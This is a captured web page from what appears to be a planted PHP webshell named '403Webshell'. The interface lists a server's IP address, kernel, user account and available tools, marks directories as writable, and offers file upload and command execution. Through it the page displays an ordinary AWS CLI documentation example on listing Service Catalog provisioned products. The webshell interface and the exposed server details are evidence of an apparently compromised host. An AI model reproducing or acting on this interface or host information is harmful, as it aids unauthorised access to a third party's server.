403Webshell
Server IP : 167.99.254.82  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux host.techisquad.com 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64
User : pawluxera ( 1011)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/awscli/examples/servicecatalog/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/awscli/examples/servicecatalog/scan-provisioned-products.rst
**To list all available provisioned products**

The following ``scan-provisioned-products`` example lists available provisioned products. ::

    aws servicecatalog scan-provisioned-products

Output::

    {
        "ProvisionedProducts": [
            {
                "Status": "ERROR",
                "Arn": "arn:aws:servicecatalog:us-west-2:123456789012:stack/mytestppname3/pp-abcd27bm4mldq",
                "StatusMessage": "AmazonCloudFormationException  Parameters: [KeyName] must have values (Service: AmazonCloudFormation; Status Code: 400; Error Code: ValidationError; Request ID: 5528602a-a9ef-427c-825c-f82c31b814f5)",
                "Id": "pp-abcd27bm4mldq",
                "Type": "CFN_STACK",
                "IdempotencyToken": "527c5358-2a1a-4b9e-b1b9-7293b0ddff42",
                "CreatedTime": 1577222793.358,
                "Name": "mytestppname3",
                "LastRecordId": "rec-tfuawdabcdxge"
            }
        ]
    }

Youez - 2016 - github.com/yon3zu
LinuXploit